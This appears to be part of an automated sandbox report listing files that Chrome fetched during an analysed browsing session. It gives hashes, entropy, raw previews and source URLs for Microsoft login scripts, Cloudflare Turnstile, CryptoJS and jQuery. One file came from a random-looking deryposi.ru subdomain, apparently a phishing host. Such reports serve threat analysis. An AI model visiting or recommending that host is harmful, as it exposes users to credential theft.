                                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57678
                                                                          Category:dropped
                                                                          Size (bytes):16378
                                                                          Entropy (8bit):7.986541062710992
                                                                          Encrypted:false
                                                                          SSDEEP:384:hOBEj/gTOkWow647Z1Y8hyJavTiIQslkHC:hOBKJB11Y8heariIQ8ki
                                                                          MD5:FC8A7FB6FB26ADEB81D76A33DA13B815
                                                                          SHA1:ADEF9857A4FC698836B613252AE8B1FC0EC199DE
                                                                          SHA-256:A3D6351A6E93FC23C2A3ABFFCBDC847D42B8781DBFFBCCEEF4FEF72E0D5D4A14
                                                                          SHA-512:DE70865494E5D2A32353614CC7D8305CAA83E1605F6BF03C58DD6E19D92FDE8B33B3E26ED3A65D739DEA20984130D39B6E43641B04918CC906DEC17E51B0D582
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 39 x 46, 8-bit/color RGB, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):61
                                                                          Entropy (8bit):4.035372245524405
                                                                          Encrypted:false
                                                                          SSDEEP:3:yionv//thPlCOll/xl/k4E08up:6v/lhPd17Tp
                                                                          MD5:C5A5A9345A5D7552C1D38CB84161FE4E
                                                                          SHA1:83896C330E3C2E0920A07B2279ACFEE52AE747CD
                                                                          SHA-256:6D2F794D477F720E4BF003413B61CEF5B268F994734C2379D2A113D0AEA8CC73
                                                                          SHA-512:1C50EBC9ED04DC2C18B3AEFB68F328935CE3DE233EC0D21A30E38A973FA288A499168EF4DE1FD5F13FBEB8FF619146D2E3B9D6920508AC9AF7B4FD255527A522
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/9020d7826b0a4252/1736891429985/QCebGfkPR2Y-Xxm
                                                                          Preview:.PNG........IHDR...'.........$......IDAT.....$.....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:downloaded
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru/UEaVhvAGqbXXRrxZgwkVGIAFMLJFCKDBJATYTKVUYGKYOKYGELQQ
                                                                          Preview:1
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142534
                                                                          Category:downloaded
                                                                          Size (bytes):49954
                                                                          Entropy (8bit):7.99493321471063
                                                                          Encrypted:true
                                                                          SSDEEP:1536:vr2T/4LxF17O6lJgX3ys65sBcY++i0RumwzV:Cz4LL1imP56m+i+umwzV
                                                                          MD5:E16AC075AC754DBD1CF969508220E30D
                                                                          SHA1:69A91FF7A1C044231D6D28B4DD4C6AD3D34F2A50
                                                                          SHA-256:E8AC3DCEF9E67CC776542A40C71B719D41668DF41D294C1A49A5AD23C5A5B5EC
                                                                          SHA-512:12C4E6E5BD999E7BF431DCA707DA4BB5193D2795DD139DCAFC38CAFA757A88F75068D3F2821840068247B9F6CFB55178EF223CDB3349444E622EA4A8E69700A6
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_eaF-Fe71oZcWvr096r6xEw2.js
                                                                          Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):48316
                                                                          Entropy (8bit):5.6346993394709
                                                                          Encrypted:false
                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                          Category:downloaded
                                                                          Size (bytes):61052
                                                                          Entropy (8bit):7.996159932827634
                                                                          Encrypted:true
                                                                          SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                          MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                          SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                          SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                          SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                          Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (47520)
                                                                          Category:downloaded
                                                                          Size (bytes):47521
                                                                          Entropy (8bit):5.3981340461317835
                                                                          Encrypted:false
                                                                          SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                          MD5:7C92EC9D1395055CE0405A32607C7291
                                                                          SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                          SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                          SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                          Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):3452
                                                                          Entropy (8bit):5.117912766689607
                                                                          Encrypted:false
                                                                          SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                          MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                          SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                          SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                          SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://login.live.com/Me.htm?v=3
                                                                          Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                          Category:dropped
                                                                          Size (bytes):61052
                                                                          Entropy (8bit):7.996159932827634
                                                                          Encrypted:true
                                                                          SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                          MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                          SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                          SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                          SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                          Category:downloaded
                                                                          Size (bytes):1435
                                                                          Entropy (8bit):7.8613342322590265
                                                                          Encrypted:false
                                                                          SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                          MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                          SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                          SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                          SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                          Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                          Category:downloaded
                                                                          Size (bytes):116345
                                                                          Entropy (8bit):7.997378915283506
                                                                          Encrypted:true
                                                                          SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                          MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                          SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                          SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                                          SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_510f960da65b56e0607c.js
                                                                          Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                          Category:dropped
                                                                          Size (bytes):1435
                                                                          Entropy (8bit):7.8613342322590265
                                                                          Encrypted:false
                                                                          SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                          MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                          SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                          SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                          SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                          Category:dropped
                                                                          Size (bytes):116345
                                                                          Entropy (8bit):7.997378915283506
                                                                          Encrypted:true
                                                                          SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                          MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                          SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                          SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                                          SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65447)
                                                                          Category:dropped
                                                                          Size (bytes):89501
                                                                          Entropy (8bit):5.289893677458563
                                                                          Encrypted:false
                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):3452
                                                                          Entropy (8bit):5.117912766689607
                                                                          Encrypted:false
                                                                          SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                          MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                          SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                          SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
